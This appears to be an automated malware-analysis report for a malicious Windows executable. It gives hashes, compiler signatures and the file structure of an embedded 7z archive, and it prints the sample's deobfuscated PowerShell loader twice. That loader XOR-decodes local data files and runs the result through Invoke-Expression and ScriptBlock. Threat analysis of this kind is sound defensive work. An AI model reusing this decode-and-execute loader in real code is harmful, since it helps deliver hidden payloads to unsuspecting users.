Malicious
Malicious

a06636d2b8aa4ce2a05d484a510f35cd

PE Executable
|
MD5: a06636d2b8aa4ce2a05d484a510f35cd
|
Size: 2.96 MB
|
application/x-dosexec

Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
a06636d2b8aa4ce2a05d484a510f35cd
Sha1
0118ba6026af1769a6a46925b81a07ea41a834b3
Sha256
e1a3e3e0cc2e8b9476504c920ee20c9e50ef9f3270d7c4562da774dd9c990c58
Sha384
d1445922da8bae556d1f0203f82e1ffb4f09c0f67f2edc50b68ef8e9688d6ff8f1b4fb7b0ab2599ba43fd3b70fc67a95
Sha512
daec71d7c78146ff226415bba56a34b6dac591eef38b0fb8731137b08c8d801bd567ab11f4c6e2a48b9242b98f4a004787f420e6f7112e4493079535dd794464
SSDeep
49152:IgwRqHtgSlNf25gsDf+fQazuUQvycsG2SV583WJn+1Z9a7KmU79fq10XbH1vugNc:IgwRe85gG+f6XvyfDaOWJn+MWmm9qqj6
TLSH
0CD5331177A391B1D48B483265ED294905DDDEAC3B1AA2CBBFEE65070DB43D0CA7E0B1

PeID

Microsoft Visual C++
Microsoft Visual C++ 5.0
Microsoft Visual C++ 6.0 DLL (Debug)
Microsoft Visual C++ v6.0
Microsoft Visual C++ v6.0
Microsoft Visual C++ v6.0 DLL
File Structure
a06636d2b8aa4ce2a05d484a510f35cd
Malicious
7z-stream @ 0x000208A1.7z
Malicious
data.bin
data1.bin
data2.bin
data3.bin
data4.bin
setup.cmd
Malicious
[Deobfuscated PS]
Malicious
Overlay_fc84303d.bin
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rdata
.data
.rsrc
Resources
RT_ICON
ID:0001
ID:1033
RT_GROUP_CURSOR4
ID:0001
ID:1033
RT_VERSION
ID:0001
ID:1033
RT_MANIFEST
ID:0001
ID:1033
Informations
Name
 Value
Info

PE Detect: PeReader OK (file layout)
Info

Overlay extracted: Overlay_fc84303d.bin (2822836 bytes)
Artefacts
Name
 Value
Deobfuscated PowerShell

@({ Write-Output "off%" } )[1] function encode($data, [int] $key) $step = ($key -Rem 10) + 1 $len = 0 return $data | ForEach-Object $key = ($key -Rem 255) + 1 $_ -bxor $key $key += $step $len if (Test-Path "data5.bin" -PathType "Leaf") { $binaryData = [File]::"ReadAllBytes"("data5.bin") $encodedData = encode -data $binaryData -key 26716 Invoke-Expression ([Encoding]::"UTF8"."GetString"($encodedData)) } if (Test-Path "data.bin") { $binaryData = [File]::"ReadAllBytes"("data.bin") $encodedData = encode -data $binaryData -key 26716 & ([ScriptBlock]::"Create"([Encoding]::"UTF8"."GetString"($encodedData))) Start-Sleep -Seconds 3 } $binaryData = [File]::"ReadAllBytes"("data1.bin") $encodedData = encode -data $binaryData -key 26716 [File]::"WriteAllBytes"("7za.exe", $encodedData)
a06636d2b8aa4ce2a05d484a510f35cd (2.96 MB)
File Structure
a06636d2b8aa4ce2a05d484a510f35cd
Malicious
7z-stream @ 0x000208A1.7z
Malicious
data.bin
data1.bin
data2.bin
data3.bin
data4.bin
setup.cmd
Malicious
[Deobfuscated PS]
Malicious
Overlay_fc84303d.bin
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rdata
.data
.rsrc
Resources
RT_ICON
ID:0001
ID:1033
RT_GROUP_CURSOR4
ID:0001
ID:1033
RT_VERSION
ID:0001
ID:1033
RT_MANIFEST
ID:0001
ID:1033
Characteristics
No malware configuration were found at this point.
Artefacts
Name
 Value Location
Deobfuscated PowerShell

@({ Write-Output "off%" } )[1] function encode($data, [int] $key) $step = ($key -Rem 10) + 1 $len = 0 return $data | ForEach-Object $key = ($key -Rem 255) + 1 $_ -bxor $key $key += $step $len if (Test-Path "data5.bin" -PathType "Leaf") { $binaryData = [File]::"ReadAllBytes"("data5.bin") $encodedData = encode -data $binaryData -key 26716 Invoke-Expression ([Encoding]::"UTF8"."GetString"($encodedData)) } if (Test-Path "data.bin") { $binaryData = [File]::"ReadAllBytes"("data.bin") $encodedData = encode -data $binaryData -key 26716 & ([ScriptBlock]::"Create"([Encoding]::"UTF8"."GetString"($encodedData))) Start-Sleep -Seconds 3 } $binaryData = [File]::"ReadAllBytes"("data1.bin") $encodedData = encode -data $binaryData -key 26716 [File]::"WriteAllBytes"("7za.exe", $encodedData)

Malicious

a06636d2b8aa4ce2a05d484a510f35cd > 7z-stream @ 0x000208A1.7z > setup.cmd
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙